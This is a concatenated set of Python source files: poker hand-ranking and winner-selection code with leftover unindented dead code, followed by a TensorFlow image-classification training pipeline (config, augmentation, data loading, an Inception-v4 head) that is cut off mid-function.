        for i in range(2,11):
            if straight_numlist[i] == 1:
                for j in range(4):
                    if straight_numlist[i + j + 1] == 0:
                        if straight_numlist[0] >= 1:
                            straight_numlist[i + j + 1] += 1
                            straight_numlist[0] -= 1
                        else:
                            break
                    if j + 1 == 4:
                        straight_number = i + j + 1
                        straight = True
                        break
        # Decide which card each joker should stand in for.
        number_of_joker = numlist[0]
        numlist[0] = 0
        if number_of_joker > 0:
            # First condition: three/four of a kind; second: exactly one pair.
            if max(numlist) >= 3 or numlist.count(2) == 1:
                numlist[numlist.index(max(numlist))] += number_of_joker
            # On high card or two pair, stack jokers on the highest number.
            else:
                for i in range(len_numlist):
                    if numlist[len_numlist - i - 1] > 0:
                        numlist[len_numlist - i - 1] += number_of_joker
                        break
        # Five of a kind.
        if 5 in numlist:
            rank = 'five of a kind'
            cardpower.append(10)
            cardpower.append(numlist.index(5))
        # Straight flush.
        elif flush and straight:
            # Royal flush.
            if numlist[14] == 1:
                rank = 'royal flush'
                cardpower.append(9)
            # Ordinary straight flush.
            else:
                rank = 'straight flush'
                cardpower.append(8)
                cardpower.append(straight_number)
        # Four of a kind.
        elif 4 in numlist:
            rank = 'four of a kind'
            cardpower.append(7)
            cardpower.append(numlist.index(4))
            cardpower.append(numlist.index(1))
        # Full house.
        elif 3 in numlist and 2 in numlist:
            rank = 'full house'
            cardpower.append(6)
            cardpower.append(numlist.index(3))
            cardpower.append(numlist.index(2))
        # Flush.
        elif flush:
            rank = 'flush'
            cardpower.append(5)
            for i in range(len_numlist):
                # A joker in a flush hand is treated as an ace (14).
                temp = len_numlist - i - 1
                if numlist[temp] > 1:
                    for j in range(numlist[temp] - 1):
                        cardpower.append(14)
                    cardpower.append(temp)
                elif numlist[temp] == 1:
                    cardpower.append(temp)
        # Straight.
        elif straight:
            rank = 'straight'
            cardpower.append(4)
            cardpower.append(straight_number)
        # Three of a kind.
        elif 3 in numlist:
            rank = 'three of a kind'
            cardpower.append(3)
            cardpower.append(numlist.index(3))
            for i in range(len_numlist):
                temp = len_numlist - i - 1
                if numlist[temp] == 1:
                    cardpower.append(temp)
        # Two pair.
        elif numlist.count(2) == 2:
            rank = 'two pair'
            cardpower.append(2)
            for i in range(len_numlist):
                temp = len_numlist - i - 1
                if numlist[temp] == 2:
                    cardpower.append(temp)
            for i in range(len_numlist):
                temp = len_numlist - i - 1
                if numlist[temp] == 1:
                    cardpower.append(temp)
        # One pair.
        elif 2 in numlist:
            rank = 'a pair'
            cardpower.append(1)
            cardpower.append(numlist.index(2))
            for i in range(len_numlist):
                temp = len_numlist - i - 1
                if numlist[temp] == 1:
                    cardpower.append(temp)
        # High card.
        else:
            rank = 'high card'
            cardpower.append(0)
            for i in range(len_numlist):
                temp = len_numlist - i - 1
                if numlist[temp] == 1:
                    cardpower.append(temp)
        # Pad cardpower to a fixed length of six entries.
        for i in range(6-len(cardpower)):
            cardpower.append(0)
        return rank, cardpower

    # Sort a hand according to its rank (cardpower).
    def rank_sort(self, hand, cardpower):
        # Every card except jokers ("except", despite the variable name).
        expect_joker_hand = []
        sorted_hand = []
        # Jokers go to the front; the rest are sorted descending by number.
        for card in hand:
            if card.number == 0:
                sorted_hand.append(card)
            else:
                expect_joker_hand.append(card)
        expect_joker_hand.sort(reverse = True, key = lambda h: h.number)
        if cardpower[0] == 0:
            # High card: descending order is already correct.
            sorted_hand.extend(expect_joker_hand)
        elif cardpower[0] == 1:
            # One pair: follow the tie-break order recorded in cardpower.
            for i in range(4):
                for card in expect_joker_hand:
                    if card.number == cardpower[i + 1]:
                        sorted_hand.append(card)
        elif cardpower[0] == 2 or cardpower[0] == 3:
            # Two pair / three of a kind.
            for i in range(3):
                for card in expect_joker_hand:
                    if card.number == cardpower[i + 1]:
                        sorted_hand.append(card)
        elif cardpower[0] == 4 or cardpower[0] == 5:
            # Straight / flush: descending order is already correct.
            sorted_hand.extend(expect_joker_hand)
        elif cardpower[0] == 6 or cardpower[0] == 7:
            # Full house / four of a kind.
            for i in range(2):
                for card in expect_joker_hand:
                    if card.number == cardpower[i + 1]:
                        sorted_hand.append(card)
        elif cardpower[0] >= 8:
            # Straight flush or better.
            sorted_hand.extend(expect_joker_hand)
        return sorted_hand
'''
def poker_winner(self, cardpower):
converted_cardpower = [list(x) for x in zip(*cardpower)]
max_rank = max(converted_cardpower[0])
if converted_cardpower[0].count(max_rank) == 1:
winner = converted_cardpower[0].index(max_rank)
return winner
else:
for i in range(len(converted_cardpower[0])):
if converted_cardpower[0][i] != max_rank:
cardpower[i] = [0, 0, 0, 0, 0, 0]
converted_cardpower = [list(x) for x in zip(*cardpower)]
for i in range(1, len(converted_cardpower)):
if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
winner = converted_cardpower[i].index(max(converted_cardpower[i]))
return winner
'''
# class PokerWinner:
# def __init__(self, cardpower_list):
# converted_cardpower = [list(x) for x in zip(*cardpower_list)]
# for i in range(len(converted_cardpower)):
# if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
# winner = converted_cardpower[i].index(max(converted_cardpower[i]))
# return winner
"""
class PokerRuleOverSixHand:
# フラッシュの判定
def judge_flush(self, hand, suitlist):
flush_hand = []
max_suit = max(suitlist)
if max_suit >= 5:
for i in range(len(hand)):
if hand[i].suit == max_suit:
flush_hand.append(hand[i])
# ストレートフラッシュの検出用
# flush_numlist = [0 for i in range(15)]
# for i in range(len(flush_numlist)):
# if flush_hand[i].number == 1:
# flush_numlist[14] += 1
# else:
# flush_numlist[flush_hand[i].number] += 1
return flush_hand
def judge_straight(self, hand, numlist):
# numlist = numlist = [0 for i in range(15)]
# for i in range(len_numlist):
# if hand[i].number == 1:
# numlist[14] += 1
# else:
# numlist[hand[i].number] += 1
straight_hand = []
straight_numlist_idx = []
#sorted_hand = sorted(hand, key=attrgetter('number'))
#flag = 0
# for i in range(len(sorted_hand) - 1):
# if sorted_hand[i+1].number - sorted_hand[i].number <= 1:
# flag += 1
# if flag == 4:
# for j in range(flag + 1):
# straight_hand.append(i + 1 - j)
# if sorted_hand[i+1].number - sorted_hand[i].number > 1:
# flag = 0
for i in range(11):
if numlist[i] > 0:
for j in range(4):
if numlist[i + j + 1] == 0:
break
elif j + 1 == 4:
#straight = True
#straight_number = 14 - i
straight_numlist_idx.append([i+k for k in range(5)])
straight_numlist = list(numlist)
for i in range(len_numlist):
if not i in list(itertools.chain.from_iterable(straight_numlist_idx)):
straight_numlist[i] = 0
straight_hand_list = []
for i in range(len(straight_numlist_idx)):
for j in range(len(straight_numlist_idx[i])):
for k in range(len(hand)):
if hand[k].number == straight_numlist_idx[i][j]:
straight_hand.append(hand[k])
straight_hand_list.append(straight_hand)
#for j in range(5):
#if max(numlist[straight_numlist_idx[i][j]]) > 1:
#for i in range(len(hand)):
# if hand[i].number in straight_numlist:
# straight_hand.append(hand[i])
return straight_hand
# def judge_straight_flush(self, flush_hand, straight_hand):
# for straight_card in straight_hand:
# if flush_card in straight_hand
# handの要素数は5~7枚を想定
# 10枚以上で2組フラッシュ、ストレートが発生した場合、
# 8枚以上で2組フォーカードが発生した場合に正常動作しないことが考えられる
def poker_rank(self, hand):
flush = False
straight = False
hand_rank = ''
hand_cardpower = []
suitlist = [0 for i in range(5)]
numlist = [0 for i in range(15)]
hand_result = []
flush_hand = list(hand.sort(key=attrgetter('suit')))
straight_hand = list(hand.sort(key=attrgetter('number')))
for i in range(len_numlist):
if hand[i].number == 1:
numlist[14] += 1
else:
numlist[hand[i].number] += 1
suitlist[hand[i].suit] += 1
flush_hand = self.judge_flush(hand)
straight_hand = self.judge_straight(hand, numlist)
if len(flush_hand) >= 5 and len(straight_hand) >= 5:
straight_flush_hand = self.judge_flush(straight_hand)
else:
straight_flush_hand = []
if numlist[0] > 0:
numlist[numlist.index(max(numlist))] += numlist[0]
numlist[0] = 0
# ファイブカードの判定
if max(numlist) >= 5:
hand_rank = 'five of a kind'
hand_result = [hand[i] for i in range(len(hand)) if hand[i].number == numlist.index(max(numlist))]
# ストレートフラッシュの判定
elif len(straight_flush_hand) >= 5:
straight_number = max(straight_flush_hand, key=attrgetter('number')).number
# ロイヤルストレートフラッシュか判定
if straight_number == 14:
hand_rank = 'royal flush'
hand_cardpower = [9, 14, 13, 12, 11, 10]
hand_result = straight_flush_hand
# 普通のストレートフラッシュの場合
else:
hand_rank = 'straight flush'
hand_cardpower.append(8)
for i in range(5):
hand_cardpower.append(straight_number - i)
hand_result = straight_flush_hand
# フォーカードの判定
elif max(numlist) + numlist[0] >= 4:
hand_rank = 'four of a kind'
hand_result = [hand[i] for i in range(len(hand)) if hand[i].number == numlist.index(max(numlist))]
hand_cardpower = [numlist.index(max(numlist)) for i in range(4)]
for i in range(len(hand)):
if not hand[len(hand) - 1 - i] in hand_result:
hand_result.append(hand[len(hand) - 1 - i])
hand_cardpower.append(hand[len(hand) - 1 - i].number)
# フルハウスの判定
elif 3 in numlist and 2 in numlist:
hand_rank = 'full house'
elif flush:
hand_rank = 'flush'
flush_hand.sort
elif straight:
hand_rank = 'straight'
elif 3 in numlist:
hand_rank = 'three of a kind'
elif numlist.count(2) >= 2:
hand_rank = 'two pair'
elif 2 in numlist:
hand_rank = 'a pair'
else:
hand_rank = 'high card'
return hand_rank, hand_result
def poker_rank(hand):
# 0=ブタ、1=ワンペア、2=ツーペア、3=スリーカード、4=ストレート、5=フラッシュ
# 6=フルハウス、7=フォーカード、8=ストレートフラッシュ、9=ロイヤルストレートフラッシュ
rank = 0
card_power = []
rank_str = ''
fixed_hand = []
# 手札が6枚以上のときも判定できるようにしていた
flush = False
straight = False
straight_flush = False
straight_number = 0
straight_flush_number = 0
suitlist = [0 for i in range(5)]
numberlist = [0 for i in range(14)]
for card in hand:
suitlist[card.suit] += 1
numberlist[card.number] += 1
if max(suitlist) >= 5:
flush = True
flush_numlist = list(numberlist)
for card in hand:
if card.suit != suitlist.index(max(suitlist)):
flush_numlist[card.number] = 0
for i in range(14):
if numberlist[i] > 0:
judge_straight_flush = True
for j in range(4):
if i + j + 1 > 13:
break
if numberlist[i + j + 1] == 0:
break
elif j == 3:
straight = True
straight_number = i + j + 1
if flush:
if flush_numlist[i + j + 1] == 0:
judge_straight_flush = False
for k in range(j + 1):
flush_numlist[k + i] = 0
elif j == 3 and judge_straight_flush:
straight_flush = True
straight_flush_number = i + j + 1
# indexメソッドで強い順にインデックスを取得するためリストを反転
numberlist.reverse()
if straight_flush:
if straight_flush_number == 13:
rank = 9
rank_str = 'royal flush'
for i in range(5):
card_power.append(i)
else:
rank = 8
rank_str = 'straight flush'
for i in range(5):
card_power.append(13 - straight_number + i)
elif max(numberlist) >= 4:
rank = 7
rank_str = 'four of a kind'
for i in range(4):
card_power.append(numberlist.index(max(numberlist)))
temp = list(numberlist)
temp[temp.index(max(temp))] = 0
card_power.append(temp.index(max(temp)))
flush = False
elif 3 in numberlist and 2 in numberlist:
rank = 6
rank_str = 'a full house'
for i in range(3):
card_power.append(numberlist.index(3))
for i in range(2):
card_power.append(numberlist.index(2))
flush = False
elif flush:
rank = 5
rank_str = 'flush'
flush_numlist.reverse()
#for i in range(5):
# card_power.append(flush_numlist.index(1))
for i in range(len(flush_numlist)):
if flush_numlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
elif straight:
rank = 4
rank_str = 'straight'
for i in range(5):
card_power.append(13 - straight_number + i)
elif 3 in numberlist:
rank = 3
rank_str = 'three of a kind'
card_power.append(numberlist.index(3))
card_power.append(numberlist.index(3))
card_power.append(numberlist.index(3))
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
elif numberlist.count(2) == 2:
rank = 2
rank_str = 'two pair'
for i in range(len(numberlist)):
if numberlist[i] == 2:
card_power.append(i)
card_power.append(i)
if len(card_power) == 4:
break
card_power.append(numberlist.index(1))
elif 2 in numberlist:
rank = 1
rank_str = 'a pair'
card_power.append(numberlist.index(2))
card_power.append(numberlist.index(2))
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
else:
rank = 0
rank_str = 'high card'
for i in range(len(numberlist)):
if numberlist[i] == 1:
card_power.append(i)
if len(card_power) == 5:
break
for i in range(len(card_power)):
card_power[i] = 13 - card_power[i]
for j in range(len(hand)):
if hand[j].number == card_power[i] and not hand[j] in fixed_hand:
fixed_hand.append(hand[j])
break
return fixed_hand, rank, rank_str, card_power
def poker_winner(rank, cardpower):
winner = []
card_power_judge = []
if rank.count(max(rank)) == 1:
winner.append(rank.index(max(rank)))
return winner, card_power_judge
else:
player_rank_idx = []
cardpower_tie = []
for j in range(len(rank)):
if rank[j] == max(rank):
player_rank_idx.append(j)
cardpower_tie.append(cardpower[j])
# 2次元配列の行と列を入れ替える
#print(cardpower_tie)
converted_cardpower = [list(x) for x in zip(*cardpower_tie)]
print(converted_cardpower)
#print(converted_cardpower)
for i in range(len(cardpower_tie[0])):
card_power_judge.append(converted_cardpower[i])
if converted_cardpower[i].count(max(converted_cardpower[i])) == 1:
#print(player_rank_idx[converted_cardpower[i].index(max(converted_cardpower[i]))])
winner.append(player_rank_idx[converted_cardpower[i].index(max(converted_cardpower[i]))])
return winner, card_power_judge
elif i == len(cardpower_tie[0]) - 1:
winner = [player_rank_idx[converted_cardpower[j].index(max(converted_cardpower[j]))] for j in range(len(cardpower_tie[0]))]
return winner, card_power_judge
"""
--- FILE SEPARATOR ---
# Decides the winner from each player's card-power vector.
class PokerWinner:
    def poker_winner(self, cardpower):
        """Return the index of the winning player.

        *cardpower* holds one list per player: [0] is the hand rank and the
        remaining entries break ties in order.

        Fixes over the old version: it mutated the caller's lists when
        zeroing out losing players, and on a complete tie it fell off the
        end and returned None (despite its comment promising that the lowest
        player index wins), which crashed the caller's indexing.
        """
        # Work on copies so the caller's lists stay untouched.
        rows = [list(row) for row in cardpower]
        # Transpose: columns[i] holds entry i of every player.
        columns = [list(col) for col in zip(*rows)]
        best_rank = max(columns[0])
        # Rank alone decides when exactly one player holds the best rank.
        if columns[0].count(best_rank) == 1:
            return columns[0].index(best_rank)
        # Knock losing ranks out, then compare tie-break columns in order.
        for idx, row in enumerate(rows):
            if row[0] != best_rank:
                rows[idx] = [0] * len(row)
        columns = [list(col) for col in zip(*rows)]
        for col in columns[1:]:
            if col.count(max(col)) == 1:
                return col.index(max(col))
        # Complete tie: the lowest tied player index wins.
        return columns[0].index(best_rank)
|
[
"/cards_system.py",
"/games.py",
"/main.py",
"/player.py",
"/poker_rank.py",
"/poker_winner.py"
] |
0011nj/train_arch
|
# -*- coding: utf-8 -*-
"""
Training configuration constants for the image-classification pipeline.

Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
# Expected input resolution per architecture:
# inception_v4:299
# resnet_v2:224
# vgg:224
IMAGE_HEIGHT = 299
IMAGE_WIDTH = 299
num_classes = 4
# Number of training epochs.
epoch = 1000
batch_size = 1
# Learning rate of the model.
learning_rate = 0.00001
# Dropout keep probability.
keep_prob = 0.8
# Fraction of all samples used for training (the rest is validation).
train_rate = 0.9
# Dataset root: one sub-directory per class (any two-level layout works).
craterDir = "sample_train"
# Choose the desired model architecture.
# arch_model="arch_inception_v4";
# arch_model="arch_resnet_v2_50"
# arch_model="vgg_16"
arch_model="arch_inception_v4"
# Variable scopes to train from scratch (excluded from checkpoint restore);
# currently it is strictly one or the other — adjust if you need otherwise.
checkpoint_exclude_scopes = "Logits_out"
# Transfer-learning checkpoint; pretrained models available at:
# https://github.com/MachineLP/models/tree/master/research/slim
# checkpoint_path="pretrain/inception_v4/inception_v4.ckpt";
# checkpoint_path="pretrain/resnet_v2_50/resnet_v2_50.ckpt"
checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"
# Trained model parameters are written to the "model" folder.
# Possible future additions:
# Image normalization: default maps to [-1,1] (load_image/load_image.py:get_next_batch_from_path); add options there.
# New architectures require changes in train_net/train.py.
# GPU selection: train_net/train.py (multi-GPU), main.py.
# Learning-rate decay: learningRate_1 = tf.train.exponential_decay(lr1_init, tf.subtract(global_step, 1), decay_steps, decay_rate, True)
# TensorBoard visualization.
# To change how parameters are updated, see train_net/train.py.
'''
def _configure_optimizer(learning_rate):
"""Configures the optimizer used for training.
Args:
learning_rate: A scalar or `Tensor` learning rate.
Returns:
An instance of an optimizer.
Raises:
ValueError: if FLAGS.optimizer is not recognized.
"""
if FLAGS.optimizer == 'adadelta':
optimizer = tf.train.AdadeltaOptimizer(
learning_rate,
rho=FLAGS.adadelta_rho,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'adagrad':
optimizer = tf.train.AdagradOptimizer(
learning_rate,
initial_accumulator_value=FLAGS.adagrad_initial_accumulator_value)
elif FLAGS.optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(
learning_rate,
beta1=FLAGS.adam_beta1,
beta2=FLAGS.adam_beta2,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'ftrl':
optimizer = tf.train.FtrlOptimizer(
learning_rate,
learning_rate_power=FLAGS.ftrl_learning_rate_power,
initial_accumulator_value=FLAGS.ftrl_initial_accumulator_value,
l1_regularization_strength=FLAGS.ftrl_l1,
l2_regularization_strength=FLAGS.ftrl_l2)
elif FLAGS.optimizer == 'momentum':
optimizer = tf.train.MomentumOptimizer(
learning_rate,
momentum=FLAGS.momentum,
name='Momentum')
elif FLAGS.optimizer == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(
learning_rate,
decay=FLAGS.rmsprop_decay,
momentum=FLAGS.rmsprop_momentum,
epsilon=FLAGS.opt_epsilon)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise ValueError('Optimizer [%s] was not recognized', FLAGS.optimizer)
return optimizer'''
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
import numpy as np
import os
from PIL import Image
import cv2
from skimage import exposure
# Random horizontal / vertical mirroring of an image.
def random_flip(image, random_flip=True):
    """Mirror *image* left-right and/or up-down, each with 50% probability."""
    if not random_flip:
        return image
    flipped = image
    if np.random.choice([True, False]):
        flipped = np.fliplr(flipped)  # left-right mirror
    if np.random.choice([True, False]):
        flipped = np.flipud(flipped)  # up-down mirror
    return flipped
# 改变光照
# 光照调节也可以用log, 参数调节和gamma相反;
# img = exposure.adjust_log(img, 1.3)
'''
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.1) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.3) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 1.5) # 调暗
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.9) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.8) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.7) # 调亮
if random_exposure and np.random.choice([True, False]):
image = exposure.adjust_gamma(image, 0.5) # 调亮
'''
def random_exposure(image, random_exposure=True):
    """With 50% probability, apply a gamma adjustment drawn from U(0.5, 1.5).

    Gamma > 1 darkens the image, gamma < 1 brightens it.
    """
    if random_exposure and np.random.choice([True, False]):
        gamma = np.random.uniform(0.5, 1.5)
        return exposure.adjust_gamma(image, gamma)
    return image
def random_rotation(image, random_rotation=True):
    """With 50% probability, rotate the image about its center.

    The angle is drawn from [0, 10) degrees (the original comment claimed
    0-180, but the code draws 0-10) and the result is scaled by 0.7;
    border pixels are filled by replicating the image edge.
    """
    if random_rotation and np.random.choice([True, False]):
        width, height = image.shape[1], image.shape[0]
        angle = np.random.randint(0, 10)
        rotation = cv2.getRotationMatrix2D(center=(width / 2, height / 2), angle=angle, scale=0.7)
        # borderValue=(129,137,130) was the previous (constant-fill) strategy.
        image = cv2.warpAffine(image, rotation, (width, height), borderMode=cv2.BORDER_REPLICATE)
    return image
def random_crop(image, crop_size=299, random_crop=True):
    """With 50% probability, cut a random crop_size x crop_size window.

    Fix over the original: the row and column offsets are now each bounded
    by their own axis, so the crop can never run past the image border.
    Previously both offsets were derived from the width alone, which could
    produce a crop with fewer than crop_size rows on non-square images.
    For square inputs the behavior (including the RNG draw order) is
    unchanged.

    Args:
        image: H x W x C array.
        crop_size: side length of the square crop (default 299).
        random_crop: master switch; when falsy the image is returned as-is.

    Returns:
        The cropped array, or the untouched input when no crop is applied.
    """
    if random_crop and np.random.choice([True, False]):
        height, width = image.shape[0], image.shape[1]
        if height > crop_size and width > crop_size:
            # Center-anchored jitter: each offset ranges over
            # [0, dim//2 - crop_size//2], as in the original square case.
            max_h = width // 2 - crop_size // 2
            max_v = height // 2 - crop_size // 2
            h = np.random.randint(0, max_h + 1)
            v = np.random.randint(0, max_v + 1)
            image = image[v:(v + crop_size), h:(h + crop_size), :]
    return image
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
import numpy as np
import os
from PIL import Image
import cv2
try:
from data_aug import random_flip, random_exposure, random_rotation, random_crop
except:
from data_aug.data_aug import random_flip, random_exposure, random_rotation, random_crop
# Works on a two-level layout: .../class-folder/image (.png, .jpg, ...).
def load_img_path(imgDir, imgFoldName, img_label):
    """Collect every file path under imgDir+imgFoldName, paired with a label.

    Returns (paths, labels): one entry per directory item, each labelled
    int(img_label).  Files are NOT opened here — validating each image at
    this point would be too slow.
    """
    folder = imgDir + imgFoldName
    data = [folder + "/" + name for name in os.listdir(folder)]
    label = [int(img_label)] * len(data)
    return data, label
def shuffle_train_data(train_imgs, train_labels):
    """Shuffle images and labels together, preserving their pairing.

    Returns numpy arrays regardless of the input sequence types.
    """
    order = [i for i in range(len(train_imgs))]
    np.random.shuffle(order)
    shuffled_imgs = np.asarray(train_imgs)[order]
    shuffled_labels = np.asarray(train_labels)[order]
    return shuffled_imgs, shuffled_labels
def load_database_path(imgDir):
    """Walk the class sub-directories of imgDir and build a shuffled dataset.

    Each sub-directory is one class; its enumeration index becomes the
    label.  Returns (image_paths, labels) as shuffled numpy arrays.
    """
    train_imgs = []
    train_labels = []
    for class_idx, folder in enumerate(os.listdir(imgDir)):
        data, label = load_img_path(imgDir + '/', folder, class_idx)
        train_imgs.extend(data)
        train_labels.extend(label)
        # Log which label each class folder was assigned.
        print ("文件名对应的label:")
        print (folder, class_idx)
    # Shuffle once so the classes are interleaved.
    return shuffle_train_data(train_imgs, train_labels)
def get_next_batch_from_path(image_path, image_labels, pointer, IMAGE_HEIGHT=299, IMAGE_WIDTH=299, batch_size=64, is_train=True):
    """Load and preprocess batch number `pointer` from a list of image files.

    Reads batch_size images starting at index pointer*batch_size, optionally
    applies random augmentation (training only), and scales pixel values
    to [-1, 1].

    Args:
        image_path: sequence of image file paths.
        image_labels: sequence of one-hot label vectors (parallel to paths).
        pointer: zero-based batch index into the dataset.
        IMAGE_HEIGHT, IMAGE_WIDTH: output image size.
        batch_size: number of images per batch.
        is_train: when True, apply flip/rotation/crop/exposure augmentation.

    Returns:
        (batch_x, batch_y): arrays of shape
        (batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, 3) and (batch_size, num_classes).
    """
    batch_x = np.zeros([batch_size, IMAGE_HEIGHT,IMAGE_WIDTH,3])
    # Number of classes is inferred from the one-hot label width.
    num_classes = len(image_labels[0])
    batch_y = np.zeros([batch_size, num_classes])
    for i in range(batch_size):
        image = cv2.imread(image_path[i+pointer*batch_size])
        # Upscale by 1.5x so the later random crop has room to jitter.
        # NOTE(review): cv2.resize expects dsize as (width, height); the
        # arguments here are (HEIGHT*1.5, WIDTH*1.5), which only matches when
        # height == width (true for the 299x299 default) — confirm.
        image = cv2.resize(image, (int(IMAGE_HEIGHT*1.5), int(IMAGE_WIDTH*1.5)))
        if is_train:
            # Random augmentation, applied only during training.
            image = random_flip(image)
            image = random_rotation(image)
            image = random_crop(image)
            image = random_exposure(image)
        image = cv2.resize(image, (IMAGE_HEIGHT, IMAGE_WIDTH))
        # Pick your own preprocessing here:
        '''
        m = image.mean()
        s = image.std()
        min_s = 1.0/(np.sqrt(image.shape[0]*image.shape[1]))
        std = max(min_s, s)
        image = (image-m)/std'''
        # image = (image-127.5)
        # Scale pixels from [0, 255] to [-1, 1].
        image = image / 255.0
        image = image - 0.5
        image = image * 2
        batch_x[i,:,:,:] = image
        # print labels[i+pointer*batch_size]
        batch_y[i] = image_labels[i+pointer*batch_size]
    return batch_x, batch_y
def test():
    """Smoke-test the data pipeline: load the "train" directory, fetch one batch."""
    craterDir = "train"
    # Fixed: the loader is named load_database_path (load_database does not
    # exist in this module and raised NameError).
    data, label = load_database_path(craterDir)
    print (len(data))
    # data holds file paths (strings), so print a sample rather than .shape.
    print (data[0])
    print (label[0])
    # get_next_batch_from_path expects one-hot label rows, not raw ints.
    num_classes = int(max(label)) + 1
    one_hot = np.eye(num_classes)[np.asarray(label, dtype=int)]
    batch_x, batch_y = get_next_batch_from_path(data, one_hot, 0, IMAGE_HEIGHT=299, IMAGE_WIDTH=299, batch_size=64, is_train=True)
    print (batch_x)
    print (batch_y)
if __name__ == '__main__':
    test()
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
slim = tf.contrib.slim
import numpy as np
import argparse
import os
from PIL import Image
from datetime import datetime
import math
import time
try:
from load_image import load_database_path, get_next_batch_from_path
except:
from load_image.load_image import load_database_path, get_next_batch_from_path
try:
from train import train
except:
from train_net.train import train
import cv2
import os
from keras.utils import np_utils
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import config
if __name__ == '__main__':
    IMAGE_HEIGHT = config.IMAGE_HEIGHT
    IMAGE_WIDTH = config.IMAGE_WIDTH
    num_classes = config.num_classes
    # Number of training epochs.
    epoch = config.epoch
    batch_size = config.batch_size
    # Learning rate of the model.
    learning_rate = config.learning_rate
    keep_prob = config.keep_prob
    ##----------------------------------------------------------------------------##
    # Fraction of all samples used for training.
    train_rate = config.train_rate
    # Dataset root: one sub-directory per class (any two-level layout works).
    craterDir = config.craterDir
    # Choose the desired architecture.
    # arch_model="arch_inception_v4"; arch_model="arch_resnet_v2_50"; arch_model="vgg_16"
    arch_model=config.arch_model
    # Variable scopes to train from scratch (excluded from checkpoint restore);
    # currently it is strictly one or the other — adjust if needed.
    checkpoint_exclude_scopes = config.checkpoint_exclude_scopes
    # Transfer-learning checkpoint.
    checkpoint_path=config.checkpoint_path
    ##----------------------------------------------------------------------------##
    print ("-----------------------------load_image.py start--------------------------")
    # Prepare the training data.
    X_sample, Y_sample = load_database_path(craterDir)
    image_n = len(X_sample)
    # Total number of samples.
    print ("样本的总数量:")
    print (image_n)
    # First train_rate (90%) of the shuffled samples are used for training.
    train_n = int(image_n*train_rate)
    valid_n = int(image_n*(1-train_rate))
    train_data, train_label = X_sample[0:train_n], Y_sample[0:train_n]
    # The remaining 10% are used for validation.
    valid_data, valid_label = X_sample[train_n:image_n], Y_sample[train_n:image_n]
    # One-hot encode the labels.
    train_label = np_utils.to_categorical(train_label, num_classes)
    valid_label = np_utils.to_categorical(valid_label, num_classes)
    ##----------------------------------------------------------------------------##
    print ("-----------------------------train.py start--------------------------")
    train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size,keep_prob,
        arch_model, checkpoint_exclude_scopes, checkpoint_path)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
slim = tf.contrib.slim
import numpy as np
import argparse
import os
from PIL import Image
from datetime import datetime
import math
import time
import cv2
from keras.utils import np_utils
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
try:
from load_image import load_database_path, get_next_batch_from_path, shuffle_train_data
except:
from load_image.load_image import load_database_path, get_next_batch_from_path, shuffle_train_data
# inception_v4
try:
from inception_v4 import inception_v4_arg_scope, inception_v4
except:
from net.inception_v4.inception_v4 import inception_v4_arg_scope, inception_v4
# resnet_v2_50, resnet_v2_101, resnet_v2_152
try:
from resnet_v2 import resnet_arg_scope, resnet_v2_50
except:
from net.resnet_v2.resnet_v2 import resnet_arg_scope, resnet_v2_50
# vgg16, vgg19
try:
from vgg import vgg_arg_scope, vgg_16
except:
from net.vgg.vgg import vgg_arg_scope, vgg_16
def arch_inception_v4(X, num_classes, dropout_keep_prob=0.8, is_train=False):
    """Inception-v4 backbone with a fresh two-layer classification head.

    The head lives in variable scope 'Logits_out' so it can be excluded
    from checkpoint restore and trained from scratch.
    """
    with slim.arg_scope(inception_v4_arg_scope()):
        backbone, _ = inception_v4(X, is_training=is_train)
    with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
        with tf.variable_scope('Logits_out'):
            # 8 x 8 x 1536 -> 1 x 1 x 1536
            head = slim.avg_pool2d(backbone, backbone.get_shape()[1:3], padding='VALID', scope='AvgPool_1a_out')
            head = slim.dropout(head, dropout_keep_prob, scope='Dropout_1b_out')
            # 1536-dim feature vector
            head = slim.flatten(head, scope='PreLogitsFlatten_out')
